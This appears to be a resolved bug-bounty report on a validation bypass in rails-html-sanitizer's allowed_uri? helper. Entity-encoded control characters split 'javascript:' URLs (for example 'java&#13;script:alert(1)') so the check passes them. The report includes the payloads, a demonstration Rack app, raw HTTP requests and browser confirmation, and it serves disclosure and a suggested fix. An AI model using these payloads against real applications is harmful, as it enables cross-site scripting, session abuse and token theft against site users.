Rails::HTML::Sanitizer.allowed_uri? returns true for entity-encoded control-character-split javascript: URLs
Low
Vulnerability Details
# Summary
`Rails::HTML::Sanitizer.allowed_uri?` returns `true` for entity-encoded control-character-split `javascript:` URLs such as:
- `java&#13;script:alert(1)`
- `java&#10;script:alert(1)`
- `jav&#9;ascript:alert(1)`
When these values are rendered into `href` attributes, browsers normalize them to `javascript:` URLs and execute them on click.
This is not a bypass of the default `sanitize(...)` DOM-scrubbing path. The issue is specifically in the public URI-validation helper exposed by `rails-html-sanitizer`.
# Affected Component
- `rails-html-sanitizer`
- `lib/rails/html/sanitizer.rb`
- `Rails::HTML::Sanitizer.allowed_uri?`
Observed on:
- `rails-html-sanitizer 1.7.0`
Relevant code:
```ruby
# lib/rails/html/sanitizer.rb
def allowed_uri?(uri_string)
  Loofah::HTML5::Scrub.allowed_uri?(uri_string)
end
```
The delegated implementation is in Loofah:
```ruby
# loofah/lib/loofah/html5/scrub.rb
def allowed_uri?(uri_string)
  val_unescaped = CGI.unescapeHTML(uri_string.gsub(CONTROL_CHARACTERS, "")).gsub("&colon;", ":").downcase
  if URI_PROTOCOL_REGEX.match?(val_unescaped)
    protocol = val_unescaped.split(SafeList::PROTOCOL_SEPARATOR)[0]
    return false unless SafeList::ALLOWED_PROTOCOLS.include?(protocol)
  end
  true
end
```
# Root Cause
The helper removes literal control characters before HTML entity decoding, but it does not remove control characters that appear only after decoding entities.
As a result:
1. `java&#13;script:...` is decoded to `java\rscript:...`
2. the helper still returns `true`
3. browsers normalize the value to `javascript:...`
This breaks the security expectation of a helper whose stated purpose is to validate URI attribute values before rendering.
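The ordering problem can be reproduced with the standard library alone. The sketch below is a simplified stand-in, not Loofah's code: `CONTROL_CHARS_SKETCH` is an assumed approximation of Loofah's `CONTROL_CHARACTERS` constant, and the two method names are hypothetical. Only the strip/decode order mirrors the helper quoted above.

```ruby
require "cgi/escape"

# Assumption: a rough approximation of Loofah's CONTROL_CHARACTERS, for illustration only.
CONTROL_CHARS_SKETCH = /[\u0000-\u0020\u007f]/

# Order used by the helper: strip literal control characters, then decode entities.
def strip_then_decode(value)
  CGI.unescapeHTML(value.gsub(CONTROL_CHARS_SKETCH, ""))
end

# Reversed order: decode entities first, then strip control characters.
def decode_then_strip(value)
  CGI.unescapeHTML(value).gsub(CONTROL_CHARS_SKETCH, "")
end

payload = "java&#13;script:alert(1)"
p strip_then_decode(payload)  # the carriage return survives, so the scheme is not recognized
p decode_then_strip(payload)  # the carriage return is gone, so the scheme is visible
```

With the first ordering the entity contains no literal control character at strip time, so the carriage return only appears after the strip step has already run.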
# Why This Matters
The helper is documented in code as a string-level URI safety check:
```ruby
# loofah/lib/loofah/html5/scrub.rb
# Returns true if the given URI string is safe, false otherwise.
# This method can be used to validate URI attribute values without
# requiring a Nokogiri DOM node.
```
In other words, this helper is meant to answer the security question:
- “Can this string safely be used as a URI attribute value?”
For the payloads above, the current answer is `true`, but browsers treat the result as executable `javascript:`.
# Important Scope Note
The default sanitization path is not being claimed as broken here.
The following still behaves safely:
```ruby
Rails::HTML5::SafeListSanitizer.new.sanitize('<a href="java&#13;script:alert(1)">x</a>')
# => "<a>x</a>"
```
So the issue is specifically:
- `allowed_uri?` validation bypass
- not a full `sanitize(...)` bypass
# Preconditions / Threat Model
Exploitability requires:
1. application code uses `Rails::HTML::Sanitizer.allowed_uri?` to validate a user-controlled URL
2. if validation succeeds, the application renders that URL into an `href` or similar browser-interpreted URI attribute
3. a user clicks the rendered link
This is therefore a framework-level validation bug with an application-dependent XSS path.
# Runtime Reproduction
Minimal helper probe:
```ruby
require "rails-html-sanitizer"
puts Rails::HTML::Sanitizer.allowed_uri?("java&#13;script:alert(1)")
puts Rails::HTML::Sanitizer.allowed_uri?("java&#10;script:alert(1)")
puts Rails::HTML::Sanitizer.allowed_uri?("jav&#9;ascript:alert(1)")
```
Observed output:
```text
true
true
true
```
Additional sanity check:
```ruby
require "rails-html-sanitizer"
san = Rails::HTML5::SafeListSanitizer.new
puts san.sanitize('<a href="java&#13;script:alert(1)">x</a>')
```
Observed output:
```text
<a>x</a>
```
This confirms the issue is in the helper, not the default DOM scrubber.
# E2E Reproduction
The following minimal Rack app reproduces a realistic application pattern:
- it accepts a user-controlled `next` URL
- it validates that URL with `Rails::HTML::Sanitizer.allowed_uri?`
- if validation succeeds, it renders a continuation link
Server used:
```ruby
require "rack"
require "rails-html-sanitizer"

app = lambda do |env|
  req = Rack::Request.new(env)
  case [req.request_method, req.path_info]
  when ["GET", "/"]
    next_url = req.params["next"].to_s
    # Fall back to the demo payload when no ?next= parameter is supplied.
    next_url = "java&#13;script:document.title='owned';document.body.innerText='EXECUTED';void(0)" if next_url.empty?
    allowed = Rails::HTML::Sanitizer.allowed_uri?(next_url)
    body = <<~HTML
      <!doctype html>
      <html>
      <head>
      <meta charset="utf-8">
      <title>allowed-uri-e2e</title>
      </head>
      <body>
      <h1>Continue</h1>
      <pre id="meta">allowed=#{allowed.inspect}\nnext=#{next_url.inspect}</pre>
      #{allowed ? %(<a id="continue" href="#{next_url}">Continue</a>) : %(<p id="blocked">Blocked</p>)}
      </body>
      </html>
    HTML
    [200, { "content-type" => "text/html; charset=utf-8" }, [body]]
  else
    [404, { "content-type" => "text/plain; charset=utf-8" }, ["not found"]]
  end
end

run app
```
Example raw request:
```http
GET /?next=java%26%2313%3Bscript%3Adocument.title%3D%27owned%27%3Bdocument.body.innerText%3D%27EXECUTED%27%3Bvoid(0) HTTP/1.1
Host: 127.0.0.1:9442
User-Agent: curl/8.7.1
Accept: */*
```
Observed raw response:
```http
HTTP/1.1 200 OK
content-type: text/html; charset=utf-8
content-length: 520
<!doctype html>
<html>
<head>
<meta charset="utf-8">
<title>allowed-uri-e2e</title>
</head>
<body>
<h1>Continue</h1>
<pre id="meta">allowed=true
next="java&#13;script:document.title='owned';document.body.innerText='EXECUTED';void(0)"</pre>
<a id="continue" href="java&#13;script:document.title='owned';document.body.innerText='EXECUTED';void(0)">Continue</a>
</body>
</html>
```
The important point is:
- the helper returns `allowed=true`
- the unsafe link is rendered
# Browser Confirmation
When the above page is opened in Chrome, the DOM normalizes the rendered link as follows:
```text
attr = "java\\rscript:document.title='owned';document.body.innerText='EXECUTED';void(0)"
href = "javascript:document.title='owned';document.body.innerText='EXECUTED';void(0)"
protocol = "javascript:"
```
After clicking the rendered link:
```text
document.title = "owned"
document.body.innerText = "EXECUTED"
```
Screenshot of the `alert('test')` case:
{F5522246}
This confirms that the helper-approved value becomes an executable `javascript:` URL in the browser.
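The normalization observed in Chrome is consistent with two steps: the HTML parser decodes character references in the attribute value, and URL parsing then drops ASCII tab, LF, and CR before the scheme is read. A rough Ruby model of those two steps follows. `browser_scheme` is a hypothetical name, `CGI.unescapeHTML` decodes numeric references but only a handful of named ones, and this is not a full HTML or URL parser.

```ruby
require "cgi/escape"

# Hypothetical helper: approximates the scheme a browser would see
# for a raw (still entity-encoded) attribute value.
def browser_scheme(raw_attr)
  decoded = CGI.unescapeHTML(raw_attr)                # attribute parsing decodes character references
  trimmed = decoded.sub(/\A[\u0000-\u0020]+/, "")     # leading C0 controls and spaces are trimmed
  cleaned = trimmed.delete("\t\n\r")                  # ASCII tab and newlines are removed everywhere
  match = cleaned.match(/\A([a-zA-Z][a-zA-Z0-9+.\-]*):/)
  match && match[1].downcase                          # nil when no scheme is present
end

p browser_scheme("java&#13;script:alert(1)")  # => "javascript"
p browser_scheme("jav&#9;ascript:alert(1)")   # => "javascript"
p browser_scheme("https://example.com/")      # => "https"
```

Comparing this model's answer with the helper's result is a quick way to spot inputs where the two disagree.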
# Suggested Fix
`allowed_uri?` should reject entity-encoded control-character-split schemes that browsers normalize into executable protocols.
At minimum:
- decode HTML entities before the final control-character normalization step, or
- strip control characters again after entity decoding, before protocol validation
Regression tests should explicitly cover:
- `java&#13;script:...`
- `java&#10;script:...`
- `jav&#9;ascript:...`
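The second option can be pictured as a check that decodes first, strips control characters from the decoded value, and only then inspects the scheme. This is a standalone sketch under stated assumptions, not a patch to Loofah: `strict_allowed_uri?`, `STRIP_AFTER_DECODE`, and `SKETCH_ALLOWED_SCHEMES` are hypothetical names, the allowlist is much smaller than Loofah's `SafeList::ALLOWED_PROTOCOLS`, and named references beyond the few that `CGI.unescapeHTML` understands are not handled.

```ruby
require "cgi/escape"

# Assumption: rough stand-in for the control characters a real fix would strip.
STRIP_AFTER_DECODE = /[\u0000-\u0020\u007f]/
# Assumption: illustrative allowlist only.
SKETCH_ALLOWED_SCHEMES = %w[http https mailto].freeze

# Hypothetical stricter check: decode, then strip, then validate the scheme.
def strict_allowed_uri?(uri_string)
  decoded = CGI.unescapeHTML(uri_string.to_s)
  normalized = decoded.gsub(STRIP_AFTER_DECODE, "").downcase
  scheme = normalized[/\A([a-z][a-z0-9+.\-]*):/, 1]
  # Values without a scheme (relative URLs) are allowed; others must be on the allowlist.
  scheme.nil? || SKETCH_ALLOWED_SCHEMES.include?(scheme)
end

# The three regression payloads, plus two benign values.
p strict_allowed_uri?("java&#13;script:alert(1)")
p strict_allowed_uri?("java&#10;script:alert(1)")
p strict_allowed_uri?("jav&#9;ascript:alert(1)")
p strict_allowed_uri?("https://example.com/")
p strict_allowed_uri?("/relative/path")
```

The three payloads are rejected because the control character is removed after decoding, which leaves `javascript` as the scheme seen by the allowlist check.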
# Notes
- Root cause appears to be in the delegated Loofah helper implementation.
- This report is scoped to the public Rails-exposed API `Rails::HTML::Sanitizer.allowed_uri?`.
- This report does not claim that the default `sanitize(...)` path is bypassed.
## Impact
This is a conditional XSS primitive through a public URI-validation helper.
If an application:
1. validates user-controlled URLs with `Rails::HTML::Sanitizer.allowed_uri?`
2. renders approved URLs into link targets or other browser-interpreted URI attributes
3. relies on the helper’s boolean result as a security decision
then an attacker can supply values that the helper marks as allowed but that browsers execute as `javascript:`.
Potential impact includes:
- client-side code execution on click
- token or sensitive-page data theft in affected flows
- arbitrary actions in the user’s session
- phishing / malicious continuation-link abuse
Report Stats
- Report ID: 3601655
- State: Closed
- Substate: resolved
- Upvotes: 1